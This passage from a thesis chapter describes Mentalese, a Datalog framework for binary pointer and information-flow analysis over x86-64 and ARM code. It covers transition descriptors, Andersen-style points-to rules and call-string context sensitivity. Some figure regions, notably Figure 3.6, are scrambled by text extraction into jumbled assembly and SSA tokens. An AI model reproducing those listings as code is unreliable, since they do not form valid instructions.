In Section 2.3.2 we introduced the notion of Collectors which are computed at lines 55-58 in Figure 2.11. These Collectors are snapshots of live register definitions at the time of a call and at the end of a leaf node. Collectors are incorporated as Scope-facts into Mental-IR. The specification of these facts are listed in Table 3.1. By using the concept of Collectors during the SSA translation, we avoid the algorithmic computation of liveness. While these costs us some storage, it has the benefit of as simple lookup and immensely eases our algorithms. As we only write out the facts for calling nodes and leaf nodes, the storage space is manageable and much lower than the Register facts. As an example, consider the basic block shown in Figure 3.6 which calls libssh2_list_add and assume a scenario of a tainted parameter or a pointer which is to track in the context of the callee. The corresponding Scope facts are listed in Figure 3.5a. The entry node for the x86-64 version of the call target in SymIL is shown in Figure 3.5b where we highlighted the use of rdi and rsi. These registers are not in SSA form which indicates that they might be parameters. In fact, following the AMD64 ABI for x86-64, the first parameter is stored in the rdi register. According to our scope facts the SSA version for this register at the callsite is rdi_82. Now we can map rdi_82 to the use of rdi in the call target. If rdi_82 gets tainted then (rsp_0 - 8) gets tainted in the callee context. Scopes are not only valuable at the callsites; at leaf nodes they are valuable to follow tracks into return receivers or can be used to map register definitions between callee and caller. 52 3.3. Frontend

r4 r4_3 Call 77828 21 _libssh2_packet_add r7 r7_0 Call 77828 21 _libssh2_packet_add lr lr_22 Call 77828 21 _libssh2_packet_add sp sp_152 Call 77828 21 _libssh2_packet_add r0 r0_105 Call 77828 21 _libssh2_packet_add r1 r1_63 Call 77828 21 _libssh2_packet_add r2 r2_105 Call 77828 21 _libssh2_packet_add r3 r3_321 Call 77828 21 _libssh2_packet_add next next_151 Call 77828 21 _libssh2_packet_add

rsp rsp_182 Call 123361 23 _libssh2_packet_add rbp rbp_0 Call 123361 23 _libssh2_packet_add cf cf_138 Call 123361 23 _libssh2_packet_add zf zf_138 Call 123361 23 _libssh2_packet_add rdi rdi_82 Call 123361 23 _libssh2_packet_add rsi rsi_61 Call 123361 23 _libssh2_packet_add rdx rdx_106 Call 123361 23 _libssh2_packet_add rcx rcx_33 Call 123361 23 _libssh2_packet_add rax rax_363 Call 123361 23 _libssh2_packet_add next next_177 Call 123361 23 _libssh2_packet_add r8 r8_3 Call 123361 23 _libssh2_packet_add

(a)

rsp_0 ← (rsp -0 x8) ( rsp_0 ) ← rbp rbp_0 ← rsp_0 (rsp_0 -8) ← rdi (rsp_0 -16) ← rsi rax_0 ← M64(rsp_0-16) rdx_0 ← M64(rsp_0-8) ( rax_0 +16) ← rdx_0 rax_1 ← M64(rsp_0-16) ( rax_1 ) ← 0x0 rax_2 ← M64(rsp_0-8) rdx_1 ← M64( rax_2 ) rax_3 ← M64(rsp_0-16) ( rax_3 +8) ← rdx_1 rax_4 ← M64(rsp_0-8) rdx_2 ← M64(rsp_0-16) ( rax_4 ) ← rdx_2 rax_5 ← M64(rsp_0-16) rax_6 ← M64(rax_5+8) zf_0 ← (rax_6==0x0) next_0 ← ((zf_0==0x1) ? 0x1c2c4 : 0x1c2b3)

(b)

Figure 3.5: Scopes: a) live definitions at the callsites to libssh2_list_add. b) Entry node of libssh2_list_add. 3. Mentalese - A Binary Analysis Framework 53 on the right side. SymIL f_ret__libssh2_list_add (0x11ada) f_ret__libssh2_list_add (0x1c269) rdx_102 rdx_103 rdx_104 rax_362 rdx_106 r2_102 r2_103 r2_104 r2_105 r3_321 M32(r7_0+24) M32(r7_0+8) M32(r7_0+24) M32(r7_0+4) M32(r7_0+24) M32(r7_0+60) M32(r7_0+12) M32(r7_0+24) M64(rsp_0-104)M64(rsp_0-128) M64(rsp_0-104)M64(rsp_0-136) M64(rsp_0-104) M64(rsp_0-56) M64(rsp_0-104)M64(rsp_0-120) (r3_320+0x128) 0x13026 (fallthrough) (rdx_105+0x1f0) 0x1e222 (fallthrough) ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← | next_151 | next_177 assembly on the left side; corresponding x86-64 and ARMv7 Thumbv2 Figure 3.6: adds r3,r3,0x128 | r3_321 call *0x1c26 | rax_363 ldrldrstrldr r3,[r7,#+24]ldr r2,[r7,#+8]str r2,[r3,#+12]ldr r3,[r7,#+24]ldr r2,[r7,#+4]str r2,[r3,#+16]ldr r3,[r7,#+24] r2,[r7,#+60]ldr r2,[r3,#+20] |mov r3,[r7,#+12] r3_317mov | | r2_102 r2,[r7,#+24] | (r3_317+12) r1,r2 r3_318 | r0,r3mov | r2_103 mov | (r3_318+16) mov | r3_319 mov | r2_104 rax,mov | (r3_319+20) qword rdx,mov r3_320 ptr qword qwordmov [rbp-104] | ptr ptr rax,mov [rbp-128] r2_105 [rax+0x18], qword rdx,mov | ptr qword rdx qwordmov [rbp-104] | rax_359 ptr ptr rax, | |r1_63mov [rbp-136] [rax+0x20], rdx_102 qword rdx, (rax_359+24) |r0_105add | ptr qword rdx qwordmov [rbp-104] | rax_360 ptr ptr rax, |mov [rbp-56] [rax+0x28], rdx_103 qword rdx, (rax_360+32) | ptr qword rdx rdx,0x1f0 [rbp-104] rax_361 ptr | rsi,rax | [rbp-120] rdi,rdx rdx_104 (rax_361+40) | | rax_362 rdx_105 | rdx_106 |rsi_61 |rdi_82 bl *0x11ada |r0_106 54 3.4. Backend

3.4 Backend

Once the binary is translated into SymIL and transformed into Mental-IR, we have established the base for the analysis of the underlying program. The backend implements an initial set of analyses that form an extensible library and which operates on the IR. It exposes an API to spawn analysis procedures and can put a human into the loop to add knowledge to the IR. The IR initially consists of EBD facts and grows with each new fact that is derived by the rule set. Each fact is an abstract element; they represent properties of interest for each instruction. The backend implements transition descriptors which uses a basic set of EBD facts to derive a higher level of abstraction on how information flows from one statement to another. Each EDB facts gives a partial image, a small detail on what goes on in a statement, and the descriptor rules aggregate the properties to sharpen the image about the information flow. Analyses can build on these descriptors. In the next sections we describe how this concept is achieved.

3.4.1 Transition Descriptors

For our analysis procedures we need a basic rule set that reasons about events. Such events are, for instance, a register to register assignment or a register to memory store, basically any event that causes an information flow and a state transition. With state, we refer to L × M, where L is the set of all program labels (addresses), and M the set of machine states (register and memory states).

Table 3.2: Transition-events.

Event SymIL-Stmt Descriptor-Rule

Register to Register reg ← reg chain_rr

Register to Memory Mem ← reg chain_rm

Memory to Register reg ← Mem chain_mr

Constant to Register reg ← cst chain_cr

Constant to Memory Mem ← cst chain_cm

Equation to Register reg ← BinOP chain_eqrr | chain_eqmr

Equation to Memory Mem ← BinOp chain_eqrm 3. Mentalese - A Binary Analysis Framework 55

Table 3.2 shows the statements that match the events according to the SymIL grammar as specified in Figure 2.7. The third column denotes the IDB predicate for each event to be deduced. For the equation to register-/memory-events we define three rules, each rule specifies a specific BinOp pattern: chain_eqrr : reg ← reg op reg chain_eqmr : reg ← [reg op reg + disp] chain_eqrm : [reg+disp] ← [reg + disp] op reg Note that the third rule is x86 specific as it allows direct arithmetic with memory operands. The operator is denoted by op. Binary operation events with the involvement of constants are not presented but implemented in a similar fashion. The following IDB rule shows the rule for a register to register move:

1 chain_rr(reg1,reg2, bb, order, ctx) :-

2 Register(_, reg1, "u", _, bb, order, ctx),

3 Register(_, reg2, "d", _, bb, order, ctx),

4 !Memory(_, _, _, _, _, bb, order, ctx),

5 !Phi(bb, order, ctx),

6 !Equation(_, _, _, _, _, _, bb, order, ctx). The first line is the header, lines 2-6 form the body of the rule. For the definition of each literal, please refer to Table 3.1. The lines 2-3 query for register uses and definitions at the same IL-address (see Definition 5). The rest of the literals constrain the type of the movement, i.e., each line restricts events that violate the register to register move property. At line 4 we avoid memory accesses, at line 5 we further restrict the query to avoid phi statements, and finally at line 6 we say that no arithmetic operation is to occur at the same IL-address. With these restrictions, we enforce a register to register move where each instantiated register use represented by reg1 is moved to the defined register represented by reg2. The rule now represents each SymIL-statement of the form: reg2 ← reg1. We call it Transition Descriptor as it describes how a state transition is performed through the statement that matches the descriptor rule. These descriptors are embedded in transitional semantics with respect to the underlying abstraction and analysis. For instance, if we know that a register r1 points to a stack location and is moved to register r2, then r2 also points to that location. Figure 3.7 shows the Datalog implementation of the descriptors for each transition event. The figure conveys the idea on how we define transition descriptors. For Equation-to events we show the implementation of the chain_eqrr rule as the patterns to build them are similar. Transition descriptors are the core building blocks on how analysis procedures are written in Mentalese. In the next section we clarify this in more detail. Note that the notion of chain is not to confuse with its mathematical definition that is tied to total orders. We use it in a metaphoric sense, as it builds a chain between expressions causing a chain of such events. 56 3.4. Backend

reg2 ← reg1

chain_rr(reg1,reg2, bb, order, ctx) :- Register(_, reg1, "u", _, bb, order, ctx), Register(_, reg2, "d", _, bb, order, ctx), !Memory(_, _, _, _, _, bb, order, ctx), !Phi(bb, order, ctx), !Equation(_, _, _, _, _, _, bb, order, ctx).

Msize(base+disp) ← reg

chain_rm(reg, base, disp, bb, order, ctx) :- Memory(_, "store", _, base_id, disp, bb, order, ctx), Register(base_id, base, "d", _, bb, order, ctx), Register(_, reg, "u", _, _, _, bb, order, ctx), !Equation(_, _, _, _, _, _, bb, order, ctx).

reg ← Msize(base+disp)

chain_mr(base, disp, reg, bb, order, ctx) :- Memory(_, "load", _, base_id, disp, bb, order, ctx), Register(base_id, base, "u", _, bb, order, ctx), Register(_, reg, "d", _, bb, order, ctx), !Equation(_, _, _, _, _, _, bb, order, ctx).

reg1 ← cst

chain_cr(cst, reg1, bb, order, ctx) :- Constant(_, cst, bb, order, ctx), Register(id_reg1, reg1, "d", _, bb, order, ctx), !Register(_, _, "u", _, bb, order, ctx), !Equation(_, _, _, _, "Cst", _, bb, order, ctx), !Memory(_, _, _, _, _, bb, order, ctx).

Msize(base+disp) ← cst

chain_cm(cst, base, disp, bb, order, ctx) :- Constant(_, cst, bb, order, ctx), !Equation(_, _, _, _, _, _, bb, order, ctx), Memory(_, "store", _, base_id, disp, bb, order, ctx), Register(base_id, base, "d", _, bb, order, ctx).

reg_def ← reg1 op reg2

chain_eqrr(reg_def, reg1, op, reg2, bb, order, ctx) :- Equation(_, op, "Reg", id1, "Reg", id2, bb, order, ctx), Register(id1, reg1, "u", _, bb, order, ctx), Register(id2, reg2, "u", _, bb, order, ctx), Register(_, reg_def,"d", _,bb, order, ctx), !Memory(_, "store", _, _, _, bb, order, ctx).

Figure 3.7: Transition Descriptors. 3. Mentalese - A Binary Analysis Framework 57

3.4.2 Pointer Analysis

For a language with pointers and dynamic memory allocations, a pointer analysis tackles the problem of determining what the pointer variable may target. The applications of pointer analysis are manyfold, building the foundation and the building blocks for other analyses, not only specific to the security field. Intuitively, the application boils down in detecting unsafe dereferences, such as null pointer dereferences, dangling pointers or uninitialized uses. Compilers use it to optimize the pipeline utilization of modern CPUs. Pointer analyses also enhance the understanding of the program, and therefore can be seen as a building block. Taint analysis, as we see, can gain a precision boost by combining it with pointer analysis. Due to a work by Ramalingam [162], we know that a sound and complete pointer analysis is undecidable. A common abstraction in static analysis to cope with pointers are Points-To relations. Therefore, pointer analysis and Points-To analysis are often used interchangeably. In common research it is referred to as a specific class of analyses to model dynamic memory allocations, which also correlates with the fact that most of the work in this field is achieved for JAVA. Studies by Pearce et al. [156] argue the differences and obstacles that the C language brings into the analysis and proposes a field sensitive technique for C programs. A more recent work by Balatsouras and Smaragdakis [16] proposes a structure sensitive technique for C/C++ programs which operates on LLVM bitcode and brings type information into the analysis to improve precision. A notion that is closely related to a Points-To analysis is Alias-analysis. Alias- analysis and Points-To analysis are two types of pointer analyses. The difference is the query we ask, i.e., for Alias-analysis we are interested in a pair of pointers which point to the same location, and for a Points-To analysis we want the targets a pointer might point to. Pointer analysis comes with different types which concern the flow, context, and field sensitivity of the analysis process. A context-sensitive approach can distinguish between different function invocations. A flow-sensitive analysis considers the order of executed instructions, i.e., it respects the control flow and typically computes a solution for each program point. Whereas a flow-insensitive analysis computes one solution per method or whole program merging information from any program point. With field sensitivity, we gain further information about different fields that are referenced through a common base pointer and its displacement. Our analysis approach utilizes an inclusion-based (Andersen style) points-to analysis [7]. Here, SSA is crucial as it implicitly enables partial flow sensitivity [97]. 58 3.4. Backend

Andersen’s Pointer Analysis

When it comes to pointer analysis two techniques stand out, Andersen [7] and Steensgard. Both techniques are insensitive to flow, context, and field. Steensgard was developed to handle large code bases: it runs linear in space and almost linear in time. A more accurate, yet slower method with an asymptotic performance of O(n3) is the Andersen algorithm. This is the worst-case performance of the method, in practice, however, Andersen has shown to be in O(n2). Each algorithm runs over the program and transforms the statements into constraints. As we use an Andersen-style technique for our binary points-to analysis, we need to clarify the concepts for a better understanding on how we implement it in Datalog. We list a simple set of rules to define the following inference system:

x = &y x = y Address-Of Assign pts(x) ⊇ {ly} pts(x) ⊇ pts(y)

x = *y *x = y Dereference read Dereference write pts(x) ⊇ pts(*y) pts(*x) ⊇ pts(y) Variables x and y are constraint variables. The rules are read top to bottom where the top expression is the code to match and the bottom expression the action that is taken. For instance, the Adreess-Of rule says that if we match a statement like x = &y, then the address of y (location ly) is taken and joined with the points-to set of x. The expression pts(x) ⊇ pts(y) states that each address in the points-to set of y is also pointed to by x. We can see why the technique is called inclusion based. Each line of code is matched against the rules yielding a set of constraints induced by the action of the rules. Applying Andersen gives us a directed graph where we draw a normal edge from x to y for each address taken and an inclusion edge for each pts(x) ⊇ pts(y) relation. We specify these relations as follows: • Assign: pts(x) ⊇ pts(y) (trivial case)

• Dereference read: ∀α ∈ pts(y) =⇒ pts(x) ⊇ pts(α)

• Dereference write: ∀α ∈ pts(x) =⇒ pts(α) ⊇ pts(y) Figure 3.8 shows a C program and its corresponding points-to graph. Line 9 is transformed into lines 10-11 to match our rules. Black edges are address taken information, blue edges are inclusion edges, red edges models information that is propagated through an inclusion edge. For instance, since the points-to set of t collapses into the points-to set of x, each pointee of t becomes a pointee of x; this is indicated by the red edge from x to y1. 3. Mentalese - A Binary Analysis Framework 59

a x x1 ⊇

t ⊇

b y y1

1 void main() { 2 int **a,**b,*x,*y,x1,y1,w1,k1; 3 x = &x1; 4 y = &y1; 5 6 a = &x; 7 b = &y; 8 9 //*a=*b; 10 int* t = *b; 11 *a = t; 12 }

Figure 3.8: Points-To Graph and its corresponding C program. Black edges are address taken edges, blue edges are inclusion edges, red edges are propagation edges.

Binary Pointer Analysis

We clarified the idea behind Andersen’s algorithm. Our approach in Mentalese follows this style and is what we referred to as the Andersen style. In the following sections we present a context- and field-sensitive analysis for binary executables that follows a similar pattern. The algorithm we present for the pointer analysis is inspired by the work of Smaragdakis et al. [187, 186]. Before we continue, we define the notations for modeling pointers that we use in the rest of this work.

Definition 7. Let V be the set of local variables, H the set of heap allocation sites, and G the set of globals, and L be the set of all code locations. Let further P = {p|p = &x, x ∈ V ∪ G} ∪ {p|p = mallocx, x ∈ H} be the set of pointers. A pointer-descriptor is defined as

P → {LocalV ar, Heap, Global} × L. where LocalV ar, Heap, and Global are strings. 60 3.4. Backend

Terms Description

t0 reg: base register

t1 disp: displacement added to base or −1 if access = "R"

t2 access: t2 ∈ {R,D}

t3 pointer_descr: pointer-descriptor

t4 id: specific ID attached to the pointer

t5 . . . t7 bb, order, ctx: IL-address

Figure 3.9: PtsTo specification: PtsTo(reg,disp,access,type,id,bb,order,ctx).

Example. For simplicity reasons we look at the C code here, rather than the binary. Assume we are confronted with the C code below:

1 int x = 0x1337;

2 int* p1 = &x;

3 int* p2 = (int*) malloc(32)

A pointer descriptor for p1 is given by (LocalV ar, 2), and for p2 we have (Heap, 3).

In Section 3.4.1 we introduced the notion of transition descriptors and implemented a rule set that sets the base for our analyses. Each transition descriptor is embedded in transitional semantics. This is best shown by code:

1 PtsTo(reg2, -1, "R", descr, id, bb, order, ctx) :-

2 chain_rr(reg1, reg2, bb, order, ctx),

3 PtsTo(reg1,-1, "R",descr,id, _, _,ctx).

We basically ask for a register to register assignment, and if the used register is a pointer, then the defined register is a pointer that points to the same location. The recursive rule specifies transitional semantics for a register to register move with respect to points-to sets. More specifically, we have our transition descriptor on line 2 which queries for register to register moves where reg1 is assigned to reg2. On line 3 we specify that reg1 has to be a pointer. Apparently, this means that reg2 holds an address as well and points to the same location as reg1. If lines 2-3 are true then PtsTo gets instantiated and we have derived a new fact that represents this information-flow in terms of points-to information. The meaning of each term in the PtsTo predicate is specified in Figure 3.9. The motivation behind this notation is to encode memory and register information

with one predicate. The term access (t2) specifies the access through a register R or memory D which stands for dereference. 3. Mentalese - A Binary Analysis Framework 61

1 push rbp push {r7}

2 mov rbp ,rsp sub sp, #36 ; 0x24

3 lea rax,[rbp-0x2c] add r7,sp,#0

4 mov QWORD PTR [rbp-0x20],rax add.w r3, r7, #8

5 lea rax,[rbp-0x30] str r3, [r7, #16]

6 mov QWORD PTR [rbp-0x28],rax adds r3, r7, #4

7 lea rax,[rbp-0x20] str r3, [r7, #12]

8 mov QWORD PTR [rbp-0x8],rax add.w r3, r7, #16

9 lea rax,[rbp-0x28] str r3, [r7, #28]

10 mov QWORD PTR [rbp-0x10],rax add.w r3, r7, #12

11 mov rax,QWORD PTR [rbp-0x10] str r3, [r7, #24]

12 mov rax,QWORD PTR [rax] ldr r3, [r7, #24]

13 mov QWORD PTR [rbp-0x18],rax ldr r3, [r3, #0]

14 mov rax,QWORD PTR [rbp-0x8] str r3, [r7, #20]

15 mov rdx,QWORD PTR [rbp-0x18] ldr r3, [r7, #28]

16 mov QWORD PTR [rax],rdx ldr r2, [r7, #20]

17 nop str r2, [r3, #0]

18 pop rbp nop

19 ret adds r7, #36 ; 0x24

20 mov sp , r7

21 ldr.w r7, [sp], #4

22 bx lr

Figure 3.10: Assembly code to the C code of Figure 3.8: left code shows x86-64 assembly, right code its Armv7 counterpart in Thumbv2.

If t2 indicates a register, then the displacement is set to −1. The term

pointer_descr (t3) is a pointer-descriptor, a string as we defined in Definition 7. It encodes a pointer that points to a stack location (LocalV ar), a heap location or a global section and associates the address of the pointer definition with it. For heap pointers, this is equivalent to the allocation site. In some cases the pointer-descriptor is not enough; for heap pointers we might want to model different invocations at the same allocation site. For stack locations it comes handy to know the stack pointer delta values (see Definition 6) that correspond to the pointed location. We want to further clarify the concept with an example for which we refer to Figure 3.10. The Figure shows the assembly code to the C code of Figure 3.8 for which we applied Andersen’s algorithm. Let’s take the third line into account on the left-hand side which is the x86-64 code. The following assembly instruction loads the address of the stack location rbp-0x2c into the register rax. lea rax, [rbp-0x2c]

The equivalent code for Armv7 in Thumbv2 mode is on line 4: add.w r3, r7, #8 62 3.4. Backend

For these two instructions the following points-to facts are taken by Mentalese into account: x86-64 PtsTo(rax_0, -1, R, ’LocalVar, 0x40110a’, -52, 4198662, 3, main) ARM PtsTo(r3_0, -1, R, ’LocalVar,0x103a6’, -32, 66464, 4, main)

Both facts describe a pointer to a stack location whose address is stored in rax and r3, respectively. The ID that is attached to these pointers is the stack pointer delta value (see Definition 6). Recall that the delta value is used to model stack locations in a normalized stack. In our x86-64 example we have a delta value of -52 as an ID which means that the pointer points to the location sp-52 where sp is the initial stack pointer. We recall that we refer to the initial stack pointer as its location at the beginning of the function call, i.e., before any modification is performed on it (see Section 3.3.1). Lines 4 and 5 in Figure 3.10 which correspond to the x86-64 and ARM code respectively, both store the pointer value onto the stack. Both of these instructions correspond to line 3 in Figure 3.8, i.e., the definition of variable x. For these instructions Mentalese derives the following facts:

x86-64 PtsTo(rsp_0, -32, D, ’LocalVar, 0x40110a’ -52, 4198662, 4, main) ARM PtsTo(r7_0, 16, D, ’LocalVar, 0x103a6’, -32, 66464, 9, main)

As the IDs indicate, these facts represent the same pointers we saw above. The facts describe a dereference where the dereferenced value is a pointer to a stack location that is described by its stack pointer delta value. In Figure 3.11 we present an intraprocedural field-sensitive pointer analysis. Each rule encapsulates a transition descriptor as defined in Section 3.4.1. The whole algorithm is an inference system that derives PtsTo facts until it saturates. The facts derived in our dereference example above are achieved through the second rule in Figure 3.11. The rule basically follows the same pattern that we covered for the first one: we ask for a register to memory store where the address of the store is symbolically modeled by base + disp, and if our register holds a pointer, then the value dereferenced from base + disp holds the same pointer. The fifth rule denoted by its header PPtsP, specifies a pointer points to pointer relation. Note that each term is grounded by variables that we already defined. The fifth rule states that if we 1) have a register to memory store to base + disp, 2) know through a derived PtsTo fact where the base register points to, and 3) know that the register value to be stored is also a pointer, then we have a pointer points to a pointer relation. We interpret a derived fact from this rule in words 3. Mentalese - A Binary Analysis Framework 63

PtsTo(reg2, -1, "R", descr, id, bb, order, ctx) :- 1 chain_rr(reg1, reg2, bb, order, ctx), PtsTo(reg1,-1, "R", descr, id, _, _,ctx).

PtsTo(base, disp, "D", descr, id, bb, order, ctx) :- 2 chain_rm(reg, base, disp, bb, order, ctx), PtsTo(reg, -1,"R", descr, id, _, _, ctx).

PtsTo(reg,-1, "R", descr, id, bb, order, ctx) :- 3 chain_mr(base, disp, reg, bb, order, ctx), PtsTo(base, disp, "D", descr, id, _, _, ctx).

PtsTo(reg, -1, "R", descr2, id2, bb, order, ctx) :- 4 chain_mr(base, disp, reg, bb, order, ctx), PtsTo(base, -1, "R", descr1, id1, bb, order, ctx), PPtsP(type1, id1, disp, descr2, id2, _, _, ctx).

PPtsP(type1, id1, disp, descr2, id2, bb, order, ctx) :- 5 chain_rm(reg, base, disp, bb, order, ctx), PtsTo(base, -1, "R", descr1, id1, _,_,ctx), PtsTo(reg, -1, "R", descr2, id2, _,_,ctx).

PtsTo(phi_def, -1, "R", descr, id, bb, order, ctx) :- Phi(bb, order, ctx), 6 Register(_, phi_def, "d", _, bb, order, ctx), Register(_, phi_use, "u", _, bb, order, ctx), PtsTo(phi_use, -1, "R", descr, id, _, _, ctx).

Figure 3.11: Pointer Analysis. that a pointer–identified by its descriptor descr1 and id1–added by disp points to a pointer described by descr2 and id2. Moreover, the fifth rule allows us to reconstruct access paths. The last rule handles φ-statements ; it says that if any of the right-hand side registers of the φ-statement is a pointer, then the left-hand side is a pointer. The following φ-statement clarifies this:

regx = φ(rega, . . . , regb)

If any register in {rega, . . . , regb} holds a pointer then regx holds that pointer. The algorithm we present in Figure 3.11 is partially flow-sensitive which we achieve through SSA. This lies in the nature of the SSA form since each definition dominates its use, and this relation respects the control flow. However, we do this 64 3.4. Backend only for registers where definitions and uses can be clearly determined. Rule three in Figure 3.11 does not consider the control flow for memory loads. The last line of the rule looks for derived PtsTo facts that are associated with memory loads from the same address ignoring the program point and thus making flow-insensitive choices. We show in the next section how we extend our algorithm to achieve better flow-sensitivity and a context-sensitive interprocedural analysis, but before we continue, we introduce the notion of starter-rules. Note that each PtsTo rule is recursive; a starter rule sets the stage for the pointer analysis by specifying an initial set of PtsTo facts. We have already covered this situation in our example. Consider lines 3 and 4 on the left and right side of Figure 3.10, respectively. These instructions use the stack pointer directly in an equation and the result is stored in a register. A set of rules in Mentalese looks for these instructions and sets up an initial PtsTo set. For Heap pointers Mentalese looks for known allocators or new operator calls that return a fresh pointer.

3.4.3 Flow-Sensitivity

The previous section covered the foundation of an intraprocedural pointer analysis for binary code. In particular, due to SSA, we have a partial flow-sensitive analysis. This is interesting since our algorithm is flow-insensitive; SSA on registers makes it flow-sensitive with respect to registers. However, with memory loads and stores taken into account, our analysis falls back into its flow-insensitive nature. We present a minor demand-driven optimization that improves the flow-sensitivity of our algorithm. The use of our StackInfoOffset facts gives us all alias pairs with respect to stack accesses. Please recall that we modeled the stack such that the stack pointer delta value is a unique identifier for any stack location within the function, and we can query for this value by searching the StackInfoOffset facts (see Section 3.3.1). We tackle the problem of the third rule in Figure 3.11 and change it to ignore stack bases. For any pointer information that flows into a stack location, we start a reaching definition analysis with respect to its stack pointer delta value. As a result, we get flow-sensitivity with respect to stack dereferences. We now add another rule to our algorithm to handle stack based dereferences which checks at the program point of the memory load if we have a reaching definition with the same stack pointer delta value. This, in particular, means that we have a flow-sensitive information flow from a program point that stored a pointer onto the stack. Flow-sensitive pointer analysis is traditionally hard. In general, the intraproce- dural case with multiple levels of pointers has NP-hardness [120]. Horwitz showed that even a precise insensitive intraprocedural analysis with multiple levels of dereferences is NP-hard [102]. 3. Mentalese - A Binary Analysis Framework 65

3.4.4 Context-Sensitivity

A context-sensitive analysis can distinguish between different method invocations. It respects the notion of realizable paths which means that the flow of information that runs through a callee flows back to the right callsite of the callee. In contrast, a context-insensitive analysis merges the information of interest at every callsite ignoring the calling context. It is controversially discussed in the past decades of research where context-sensitivity brings a benefit and when the precision is worth the effort. Context can also be interpreted from a different point of view which has given rise to other analysis flavors, such as object-sensitivity. We follow the classic technique which is known as the callstring approach. Here, a pointer passed to a callee is associated with a unique calling string. For this purpose we

use the pointer-descriptor term (t3) in our PtsTo literal. On the assembly level, we have different calling conventions according to different ABIs. Go programs, for instance, come with their own ABI, and Rust programs don’t follow an ABI at all. Other operating systems might enforce their own calling convention2. The question that arises here is how to handle these programs on the binary level? What we need to follow is a generic approach that tries to infer what parameters are. We approach the problem with queries for registers that are not SSA subscripted. These registers can be callee saved registers, but are also candidates for parameters. For variables passed through the stack we look for a positive stack pointer delta value. For the first case, we utilize the Scope facts (see Section 3.3.3). Recall that these facts give us all live SSA registers at the callsite. Here we check if a parameter candidate–a register without subscription–matches one of our scoped registers. For instance, in a X86-64 the common calling convention is fastcall that follows the AMD64 ABI in Linux operating systems. Here, the register for the first parameter is rdi. Let’s recall the example from Figure 3.5 which shows scope facts at the callsites to libssh2_list_add. For each callsite we check for non-subscripted registers in the callee and match it through scope facts with the definition of the register at the callsite. We call such a register a passthrough. In our example of Figure 3.5 rdi_82 and rsi_61 are passthroughs for the x86-64 case which are respectively matched to their non-subscripted counterparts rdi and rsi in the callee context; for ARM, r_0_105 and r_1_63 are passthroughs. The following rule delivers the idea:

2Windows vs Linux fastcall on x86-64 66 3.4. Backend

PassThrough(reg_ssa, bb, order, ctx_caller, reg, bb_callee, order_callee, ctx_callee) :- Scope(reg, reg_ssa, "Call", bb, order, ctx_caller), CallTo(_, ctx_callee, _, ".text", bb, order, ctx_caller), Register(_, reg, "u", _, bb_callee, order_callee, ctx_callee), !StackBased(reg), !Phi(bb_callee, order_callee, ctx_callee).

The first term of the literal is the SSA subscripted live definition of the register at the callsite, and the fifth term the non-subscripted use of the register in the callee at the IL-address (bb, order, ctx). In the rule we ignore the cases for the stack pointer and we ignore φ-statements which are handled in a separate rule. This is motivated by the fact that in some binaries we encounter sequences of φ-chains which we define as a def-use relation between two φ-statements .

Definition 8. Let S1 : rim = φ(ria , . . . , rik ), and S2 : rin = φ(rja , . . . , rim , . . . , rjk ) be two φ-statements where i, j ∈ N. The right-hand side of the statement is called

φ-expression .A φ-chain links rim in S1 with its use in the φ-expression of S2.

With the φ-chains handled, we get a proper PassThrough relation. What is left is the transitive closure of PassThrough relations which covers the cases where a parameter is literally passed through a chain of calls until it is used. Pointer information that runs into a passthrough induces a new context by appending the callsite address to the pointer-descriptor (see Definition 7). Let’s assume that we have the following Scope and PtsTo fact derived:

1 Scope(rdi, rdi_13, "Call", 4199094, 23, A).

2 PtsTo(rdi_13, -1, "R", "LocalVar,0x401290", 4199094, 20, A).

3 PtsTo(rdi, -1, "R", "LocalVar,0x401290,0x4012be",4198720,10,B).

The register rdi_13 is a passthrough register and we have a PtsTo fact associated with it at line 2. What we derive for the callee B, is a new PtsTo fact at line 3 with the callsite appended to the pointer-descriptor. The following rule shows how we derive these facts:

1 PtsTo(reg_callee, -1, "R", descr, id, bb, order, ctx_callee) :-

2 PassThrough(reg_caller,_,_,ctx_caller,

3 reg_callee,bb,order,ctx_callee),

4 Scope(_, reg_caller,"Call",bb_caller,order_caller,ctx_caller),

5 ILAddrToAddr(bb_caller,order_caller,cs_addr),

6 PtsTo(base_reg,-1,"R", descr,id,_,_,ctx_caller),

7 kSensitivity(k),

8 descr = Push(descr, cs_addr, k). 3. Mentalese - A Binary Analysis Framework 67

The last line introduces a new concept into the language: functors. Functors are custom functions—written in any language—that ease the logic and can be called on instantiated terms. Functors are usually not part of Datalog, but some dialects like Soufflé allow them. In Soufflé we can call them within the predicate and the return value of the functor instantiates the corresponding term in that predicate. With functors Datalog becomes Turing-Complete and the termination of a program is not guaranteed anymore as we discussed in Section 3.1.1. Therefore, caution is required when using functors. We summarize our functors as follows:

• Push: ((P ool, loc), callsite, k) 7→ (P ool, loc, callsite), P ool ∈ {LocalV ar, Heap, Global}

• Pop:

(P ool, loc, callsite1, . . . , callsitek) 7→ (P ool, loc, callsite1, . . . , callsitek−1) ∧

(P ool, loc) 7→ id(P ool,loc) if tuple has length 2

• AddrOf:

(P ool, loc, callsite1, . . . , callsitek) 7→ callsitek

The Push functor takes three arguments: the pointer-descriptor, the callsite address, and an integer. It concatenates the callsite address to the descriptor. The third parameter k is an integer that specifies the depth of the call chain. The functor appends a context to the descriptor cycle free. This allows us to put a variation of a technique into play which is known as k-limiting or k-sensitivity which describes context-sensitivity under the scope of the last k callsites. In Figure 3.12 we present the extensions for context-sensitivity. The first rule describes the Push mechanism we presented above. The second rule updates the PPtsP facts in the context of the caller. The term descr1 gets instantiated with a pointer-descriptor—given that there is any derived fact—and the callsite gets extracted by AddrOf. We use the ILAddrToAddr facts to map the callsite address to an IL-address. Now we basically misuse Register facts to get from the basic block to the caller context. Note that with the Pop of the corresponding pointer- descriptor in the header, one callsite is removed, and we get a descriptor for the caller. This way, each PPtsP fact induced by effects of the callee is mapped back to the right callsite in the context of the caller. The third rule follows the other direction; it passes information from caller to callee. For this rule, we first look at memory to register moves, check if the base of the memory load points to something we have derived, and basically uses the trick with Pop but from the point of view of the callee. 68 3.4. Backend

PtsTo(reg_callee, -1, "R", descr, id, bb, order, ctx_callee) :- PassThrough(reg_caller,_,_,ctx_caller, reg_callee,bb,order,ctx_callee), 1 Scope(_, reg_caller,"Call",bb_caller,order_caller,ctx_caller), ILAddrToAddr(bb_caller,order_caller,cs_addr), PtsTo(base_reg,-1,"R", descr,id,_,_,ctx_caller), kSensitivity(k), descr = Push(descr, cs_addr, k).

